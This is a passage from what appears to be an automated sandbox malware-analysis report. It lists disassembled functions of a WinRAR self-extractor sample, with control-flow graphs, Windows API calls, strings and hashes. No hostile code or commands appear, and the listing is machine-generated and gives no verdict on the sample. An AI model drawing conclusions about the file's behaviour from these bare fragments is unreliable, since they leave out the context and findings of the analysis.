                                                                                                                                                                            • GetDlgItem.USER32(?,00000068), ref: 002612A6
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 002612BE
                                                                                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 002612E6
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0026135D
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00261371
                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 002615A7
                                                                                                                                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 002615E8
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0026160D
                                                                                                                                                                              • Part of subcall function 00261D4F: __EH_prolog3_GS.LIBCMT ref: 00261D59
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                                                                                                                                                            • String ID: -el -s2 "-d%s" "-sp%s"$<$@$@S)$@U=u$LICENSEDLG$STARTDLG$\S)$__tmp_rar_sfx_access_check_$`!>uJ&$winrarsfxmappingfile.tmp
                                                                                                                                                                            • API String ID: 3616063595-4251723326
                                                                                                                                                                            • Opcode ID: e54697d2651bac5b9290c427b4bab2e7666800a9c5f0fc1ccb6c51518a1589b4
                                                                                                                                                                            • Instruction ID: 882e8a928b9bd25755f3ead8aabcd26bb13e5cae07c0c78fa96fe34f7eda34ba
                                                                                                                                                                            • Opcode Fuzzy Hash: e54697d2651bac5b9290c427b4bab2e7666800a9c5f0fc1ccb6c51518a1589b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C72D470920358AEEF25EBA0DC89FEE7BB9AB01704F044099F505B7192D7B05AE4CF21
                                                                                                                                                                            Function 00256D7B Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 394libraryfileloaderCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 474 256d7b-256dd1 call 265b20 GetModuleHandleW 477 256dd3-256de3 GetProcAddress 474->477 478 256e28-25708c 474->478 481 256de5-256dfb 477->481 482 256dfd-256e0d GetProcAddress 477->482 479 257092-25709d call 26e50e 478->479 480 25719b 478->480 479->480 491 2570a3-2570b8 call 2513f9 479->491 484 25719d-2571be call 2513f9 call 252117 480->484 481->482 482->478 483 256e0f-256e24 482->483 483->478 497 2571c0-2571cc call 25067e 484->497 498 2570bd-2570d5 CreateFileW 491->498 499 2570ba 491->499 508 257203-257234 call 2414a7 call 25229d call 241a66 call 24ed1f 497->508 509 2571ce-2571dc call 256c5e 497->509 501 257186-257199 CloseHandle call 241a66 498->501 502 2570db-2570e7 SetFilePointer 498->502 499->498 501->484 502->501 503 2570ed-257107 ReadFile 502->503 503->501 506 257109-257114 503->506 511 2573f2-2573f7 call 265ce1 506->511 512 25711a-25714d call 2414a7 506->512 538 257239-25723c 508->538 509->508 521 2571de-257201 CompareStringW 509->521 524 257161-257174 call 256366 512->524 521->508 522 25723e-257242 521->522 522->497 526 257248 522->526 532 257176-257181 call 241a66 * 2 524->532 533 25714f-257156 524->533 529 25724c-257250 526->529 534 257296-257298 529->534 535 257252 529->535 532->501 536 257158 533->536 537 25715b-25715c call 256c5e 533->537 539 2573bd-2573ef call 241a66 * 2 call 265734 534->539 540 25729e-2572b1 call 252187 call 25067e 534->540 542 257254-25728a call 2414a7 call 25229d call 241a66 call 24ed1f 535->542 536->537 537->524 538->522 544 25724a 538->544 559 2572b3-257330 call 256c5e * 2 call 254318 call 256a25 call 254318 call 2414a7 call 25ecf5 call 241549 540->559 560 257332-257366 call 256a25 AllocConsole 540->560 576 257294 542->576 577 25728c-257290 542->577 544->529 578 2573b0-2573b7 call 241549 ExitProcess 559->578 571 2573ad 560->571 572 257368-2573a7 GetCurrentProcessId AttachConsole call 257441 call 257436 GetStdHandle WriteConsoleW Sleep FreeConsole 560->572 571->578 572->571 576->534 577->542 581 257292 577->581 581->534
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,6294DA82), ref: 00256DC7
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00256DD9
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00256E03
                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002570CA
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002570DF
                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 002570FF
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00257187
                                                                                                                                                                            • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 002571F8
                                                                                                                                                                            • AllocConsole.KERNEL32 ref: 0025735E
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00257368
                                                                                                                                                                            • AttachConsole.KERNEL32(00000000), ref: 0025736F
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 0025738F
                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00257396
                                                                                                                                                                            • Sleep.KERNEL32(00002710), ref: 002573A1
                                                                                                                                                                            • FreeConsole.KERNEL32 ref: 002573A7
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 002573B7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                                                                                                                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                                            • API String ID: 2644799563-3298887752
                                                                                                                                                                            • Opcode ID: dc8f08188d1fa23e2b2bc4c9d216dc75ee18e878309e78e45408c839a72d8784
                                                                                                                                                                            • Instruction ID: 6b607d4288c963d91daba6da03fc8931b8fd95a8f168c73fb34528e37b5f50f6
                                                                                                                                                                            • Opcode Fuzzy Hash: dc8f08188d1fa23e2b2bc4c9d216dc75ee18e878309e78e45408c839a72d8784
                                                                                                                                                                            • Instruction Fuzzy Hash: E4F19CB14202899BCB24EFA4DC49BDE3BB9BF05305F508119FD0DAB281DB709669CF95
                                                                                                                                                                            Function 00263572 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 106windowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 597 263572-2635aa call 260678 GetDlgItem 600 2635e4-263622 597->600 601 2635ac-2635c8 call 25d455 ShowWindow 597->601 607 263624-26363f 600->607 608 263643-263659 600->608 606 2635cf-2635dd 601->606 606->600 607->608 611 26365d-26367d 608->611 612 26365b 608->612 615 2636a2-2636c3 call 265734 611->615 616 26367f-26369b 611->616 612->611 616->615
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00260678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00260689
                                                                                                                                                                              • Part of subcall function 00260678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0026069A
                                                                                                                                                                              • Part of subcall function 00260678: IsDialogMessageW.USER32(000103E6,?), ref: 002606AE
                                                                                                                                                                              • Part of subcall function 00260678: TranslateMessage.USER32(?), ref: 002606BC
                                                                                                                                                                              • Part of subcall function 00260678: DispatchMessageW.USER32(?), ref: 002606C6
                                                                                                                                                                            • GetDlgItem.USER32(00000068,00000000), ref: 00263595
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,0025FD20,00000001,?,?), ref: 002635BA
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002635C9
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,0027C6C8), ref: 002635D7
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002635F1
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0026360B
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0026364F
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00263662
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00263675
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0026369C
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,0027C860), ref: 002636AB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                            • String ID: @U=u$\
                                                                                                                                                                            • API String ID: 3569833718-2368183754
                                                                                                                                                                            • Opcode ID: 2363b1168457406e14e09d7461b4de6c319cba6c70934fb2e9fc7fa0484b3388
                                                                                                                                                                            • Instruction ID: 2c52549fe9a8f546450f6353099786c21d340ef17e967cc1b0c130dd601b4a50
                                                                                                                                                                            • Opcode Fuzzy Hash: 2363b1168457406e14e09d7461b4de6c319cba6c70934fb2e9fc7fa0484b3388
                                                                                                                                                                            • Instruction Fuzzy Hash: E231D071259700BFE311DF20EC4DFAB7BECEF46711F00051AF955962A1DB7099448BAA
                                                                                                                                                                            Function 002638A0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 291windowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 620 2638a0-2638bc call 2657d8 623 263bc7-263bd4 call 241a66 call 265787 620->623 624 2638c2-2638c8 620->624 624->623 625 2638ce-2638f4 call 2671f0 624->625 631 2638f6 625->631 632 2638fd-263909 625->632 631->632 634 26390d-263916 632->634 635 26390b 632->635 636 263924-263927 634->636 637 263918-26391b 634->637 635->634 640 26392b-263935 636->640 641 263929 636->641 638 26391f-263922 637->638 639 26391d 637->639 638->640 639->638 642 2639ce 640->642 643 26393b-263948 640->643 641->640 644 2639d1-2639d3 642->644 645 26394c-263956 643->645 646 26394a 643->646 649 2639d5-2639da 644->649 650 2639dc-2639de 644->650 647 26398c-263999 645->647 648 263958 645->648 646->645 654 26399d-2639a7 647->654 655 26399b 647->655 651 26396f-263972 648->651 649->650 652 2639ff-263a11 call 251383 649->652 650->652 653 2639e0-2639e7 650->653 656 263974 651->656 657 26395a-26395f 651->657 675 263a13-263a20 call 258da4 652->675 676 263a29-263a64 call 2414a7 call 24ed0d call 241a66 652->676 653->652 658 2639e9-2639f5 653->658 660 263bd7-263bdd 654->660 661 2639ad-2639b2 654->661 655->654 656->647 662 263963-26396d 657->662 663 263961 657->663 664 2639f7 658->664 665 2639fc 658->665 666 263be1-263be8 660->666 667 263bdf 660->667 669 2639b6-2639bc 661->669 670 2639b4 661->670 662->651 672 263976-26397b 662->672 663->662 664->665 665->652 673 263c00-263c06 666->673 674 263bea-263bf0 666->674 667->666 669->660 671 2639c2-2639c5 669->671 670->669 671->643 679 2639cb 671->679 681 26397f-263989 672->681 682 26397d 672->682 677 263c0a-263c14 673->677 678 263c08 673->678 683 263bf4-263bfd 674->683 684 263bf2 674->684 675->676 688 263a22 675->688 693 263a66-263a95 call 2414a7 call 250e49 call 241a66 676->693 694 263a9d-263aac ShellExecuteExW 676->694 677->644 678->677 679->642 681->647 682->681 683->673 684->683 688->676 730 263a97 693->730 731 263a9a 693->731 695 263ab2-263abc 694->695 696 263b7c-263b82 694->696 698 263abe-263ac0 695->698 699 263aca-263acc 695->699 701 263bb7-263bc3 696->701 702 263b84-263b99 696->702 698->699 703 263ac2-263ac8 698->703 704 263ae5-263af6 WaitForInputIdle call 263fcf 699->704 705 263ace-263ad7 IsWindowVisible 699->705 701->623 707 263bae-263bb6 call 265726 702->707 708 263b9b-263bab call 2419a9 702->708 703->699 710 263b30-263b3b CloseHandle 703->710 718 263afb-263b02 704->718 705->704 711 263ad9-263ae3 ShowWindow 705->711 707->701 708->707 715 263b4c-263b53 710->715 716 263b3d-263b4a call 258da4 710->716 711->704 722 263b55-263b57 715->722 723 263b6b-263b6d 715->723 716->715 716->723 718->710 724 263b04-263b06 718->724 722->723 727 263b59-263b5f 722->727 723->696 728 263b6f-263b71 723->728 724->710 729 263b08-263b17 GetExitCodeProcess 724->729 727->723 732 263b61 727->732 728->696 733 263b73-263b76 ShowWindow 728->733 729->710 734 263b19-263b22 729->734 730->731 731->694 732->723 733->696 735 263b24 734->735 736 263b29 734->736 735->736 736->710
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002638A7
                                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00263AA4
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00263ACF
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00263ADD
                                                                                                                                                                            • WaitForInputIdle.USER32(?,000007D0), ref: 00263AED
                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00263B0F
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00263B33
                                                                                                                                                                            • ShowWindow.USER32(?,00000001), ref: 00263B76
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                                                                                                                                                            • String ID: .exe$.inf$\'
                                                                                                                                                                            • API String ID: 3208621885-2242554641
                                                                                                                                                                            • Opcode ID: 3fca241c64398a0af1c19e1455fcff9fae7d11e1ff517aad31293706d1aa1e3b
                                                                                                                                                                            • Instruction ID: 19801bb06f3578a9fd96f1dc64b4fc26e160b71d0b36ed0b12e04549c0d6b33e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3fca241c64398a0af1c19e1455fcff9fae7d11e1ff517aad31293706d1aa1e3b
                                                                                                                                                                            • Instruction Fuzzy Hash: 97B1BB30A21259DFCB25DF64D8897EDB7B5FF44314F28811AE848A7290D7B0AEE5CB50
                                                                                                                                                                            Function 00262813 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 299COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1064 262813-262845 call 247673 1067 262847 1064->1067 1068 26284a-262850 1064->1068 1067->1068 1069 262856-26285b 1068->1069 1070 262abd 1068->1070 1071 262860-26286e 1069->1071 1072 26285d 1069->1072 1073 262abf-262ac3 1070->1073 1074 262896 1071->1074 1075 262870-26287c 1071->1075 1072->1071 1076 262ac5-262ac8 1073->1076 1077 262ace-262ad2 1073->1077 1079 262899-26289c 1074->1079 1075->1074 1078 26287e 1075->1078 1080 262af7 1076->1080 1081 262aca-262acc 1076->1081 1077->1080 1082 262ad4-262ad7 1077->1082 1084 262884-262888 1078->1084 1085 262ab7 1079->1085 1086 2628a2-2628a7 1079->1086 1089 2634ad-2634ed call 2458cb 1080->1089 1087 262ada-262af2 call 247673 call 2638a0 1081->1087 1082->1080 1083 262ad9 1082->1083 1083->1087 1090 2629f0-2629f2 1084->1090 1091 26288e-262894 1084->1091 1085->1070 1092 2628ac-2628d7 call 26acee call 241afc 1086->1092 1093 2628a9 1086->1093 1087->1080 1102 2634f7-263500 1089->1102 1103 2634f2 call 2657d8 1089->1103 1090->1074 1095 2629f8-2629fc 1090->1095 1091->1074 1091->1084 1092->1089 1107 2628dd-2628e1 1092->1107 1093->1092 1095->1079 1105 263504-263514 call 250d1d 1102->1105 1106 263502 1102->1106 1103->1102 1112 263516-26351c 1105->1112 1113 26356a-26356f call 265787 1105->1113 1106->1105 1110 2628e5-2628ec 1107->1110 1111 2628e3 1107->1111 1114 2628f1-26292f call 24120c call 25645a 1110->1114 1115 2628ee 1110->1115 1111->1110 1116 263520-263526 1112->1116 1117 26351e 1112->1117 1131 262935-262937 1114->1131 1115->1114 1121 263533-263565 call 249733 call 241150 call 2425a4 call 241a66 * 2 1116->1121 1122 263528-263531 call 2513da 1116->1122 1117->1116 1121->1113 1122->1113 1122->1121 1133 262a01-262a07 1131->1133 1134 26293d-26299f call 2414a7 call 24adaa call 241a66 call 2414a7 call 24adaa call 241a66 1131->1134 1135 262a4e-262a68 1133->1135 1136 262a09-262a24 1133->1136 1168 2629a4-2629d2 call 2414a7 call 24adaa call 241a66 1134->1168 1169 2629a1-2629a3 1134->1169 1139 262aaf-262ab5 1135->1139 1140 262a6a-262a85 1135->1140 1141 262a26-262a3f call 2419a9 1136->1141 1142 262a45-262a4d call 265726 1136->1142 1139->1073 1146 262aa6-262aae call 265726 1140->1146 1147 262a87-262aa0 call 2419a9 1140->1147 1141->1142 1142->1135 1146->1139 1147->1146 1176 2629d7-2629eb call 25645a 1168->1176 1177 2629d4-2629d6 1168->1177 1169->1168 1176->1131 1177->1176
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                            • String ID: HIDE$MAX$MIN
                                                                                                                                                                            • API String ID: 176396367-2426493550
                                                                                                                                                                            • Opcode ID: 132def0dccd4a3ae5a342446e33dd6c0fbc557e55eda2daa7f854c1570c1401f
                                                                                                                                                                            • Instruction ID: fe2d4177a359ff3b6ac093b7e818c08827331021b8616c6189b75562fd48bc7d
                                                                                                                                                                            • Opcode Fuzzy Hash: 132def0dccd4a3ae5a342446e33dd6c0fbc557e55eda2daa7f854c1570c1401f
                                                                                                                                                                            • Instruction Fuzzy Hash: 64B1BE72C20669DACF25DFA4CC85ADDBBB8AF49300F14019AE445B7181DB709EE9CF61
                                                                                                                                                                            Function 00259556 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 258COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1180 259556-259572 call 25a570 1183 2595e4-2595f1 1180->1183 1184 259574-259577 1180->1184 1185 2595f4-2595f6 1184->1185 1186 259579-259593 1184->1186 1185->1183 1189 2595f8-25960a call 25906e 1185->1189 1187 259595-259597 1186->1187 1188 25959b-25959d 1186->1188 1187->1188 1190 25960c-25961a call 25906e 1188->1190 1191 25959f-2595ac call 26d08c 1188->1191 1196 25961e-259637 call 26734a 1189->1196 1190->1196 1200 2595bd-2595e2 call 2671f0 1191->1200 1201 2595ae-2595b9 1191->1201 1207 259639-25963e 1196->1207 1208 259648-25964d 1196->1208 1200->1183 1200->1184 1201->1190 1203 2595bb 1201->1203 1203->1191 1209 259644-259646 1207->1209 1210 259640-259642 1207->1210 1211 25965d-25965f 1208->1211 1212 25964f 1208->1212 1213 259671-25967e 1209->1213 1210->1208 1210->1209 1216 259665-25966b 1211->1216 1217 25975f-259771 call 25906e 1211->1217 1214 259655-259657 1212->1214 1215 259773-259781 call 25906e 1212->1215 1219 259685-259690 1213->1219 1220 259680-259683 1213->1220 1214->1211 1214->1215 1225 259785-259786 call 26734a 1215->1225 1216->1213 1216->1217 1217->1225 1223 259696-25969c 1219->1223 1220->1219 1220->1223 1226 259755-25975c 1223->1226 1227 2596a2 1223->1227 1231 25978b-259799 call 25906e 1225->1231 1229 2596a4-2596aa 1227->1229 1230 2596b0-2596b2 1227->1230 1229->1226 1229->1230 1232 2596b4-2596b7 1230->1232 1233 2596dc-2596eb call 26d087 1230->1233 1240 25979d-2597b7 call 26734a call 2657a5 1231->1240 1232->1231 1235 2596bd-2596c4 1232->1235 1242 2596f2-2596f3 call 26d08c 1233->1242 1243 2596ed-2596f0 1233->1243 1235->1233 1238 2596c6-2596c8 1235->1238 1238->1233 1241 2596ca 1238->1241 1266 2597d2-2597d5 1240->1266 1267 2597b9-2597bf call 265ddf 1240->1267 1241->1231 1246 2596d0-2596d6 1241->1246 1251 2596f8-2596fd 1242->1251 1244 2596ff-259701 1243->1244 1248 259721 1244->1248 1249 259703-259709 1244->1249 1246->1231 1246->1233 1254 259723 1248->1254 1255 259739 1248->1255 1252 25971f 1249->1252 1253 25970b-25971d call 25906e 1249->1253 1251->1244 1257 259740-259747 1251->1257 1252->1248 1253->1240 1259 259725-25972b 1254->1259 1260 25972d-259734 call 259556 1254->1260 1255->1257 1257->1226 1262 259749-25974f 1257->1262 1259->1255 1259->1260 1260->1255 1262->1226 1268 259896-25989b call 265773 1266->1268 1269 2597db-259810 call 265ddf 1266->1269 1273 2597c4-2597cf call 2671f0 1267->1273 1278 259812-259828 call 265b4b 1269->1278 1279 25982d-259848 call 2671f0 1269->1279 1273->1266 1278->1279 1279->1268 1283 25984a-25984c 1279->1283 1284 25984f-25985b 1283->1284 1285 25985d-25986c call 26d08c 1284->1285 1286 259889-259894 1284->1286 1288 259871-25987a 1285->1288 1286->1268 1286->1284 1289 259886 1288->1289 1290 25987c-259881 call 249384 1288->1290 1289->1286 1290->1289
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID: Lc($Lc($Lc($Lc(
                                                                                                                                                                            • API String ID: 431132790-695443888
                                                                                                                                                                            • Opcode ID: 1cb9d1e95600f95193aecfad4b3f72563454b1c7d1356f3fae614e097a772f7d
                                                                                                                                                                            • Instruction ID: 57746710ee2dc77a3c7b0ed103f8562f960acfdd9c377c8d60c5742553bced28
                                                                                                                                                                            • Opcode Fuzzy Hash: 1cb9d1e95600f95193aecfad4b3f72563454b1c7d1356f3fae614e097a772f7d
                                                                                                                                                                            • Instruction Fuzzy Hash: 568146B1934315CFDB24EF64C889B6AB7E8AF45311F00092EEC5597181E7B099FC8B99
                                                                                                                                                                            Function 00263EFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1292 263efc-263f11 call 2657d8 1295 263f15-263f45 SetEnvironmentVariableW call 256366 1292->1295 1296 263f13 1292->1296 1298 263f4a-263f4c 1295->1298 1296->1295 1299 263f4e 1298->1299 1300 263f8c-263f92 1298->1300 1303 263f51-263f57 1299->1303 1301 263fc7-263fcc call 265787 1300->1301 1302 263f94-263fa9 1300->1302 1305 263fbe-263fc6 call 265726 1302->1305 1306 263fab-263fbb call 2419a9 1302->1306 1307 263f5b-263f67 call 256624 1303->1307 1308 263f59 1303->1308 1305->1301 1306->1305 1316 263f72-263f76 1307->1316 1317 263f69-263f70 1307->1317 1308->1307 1318 263f7a-263f86 SetEnvironmentVariableW 1316->1318 1319 263f78 1316->1319 1317->1303 1318->1300 1319->1318
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00263F03
                                                                                                                                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00263F1B
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00263F86
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
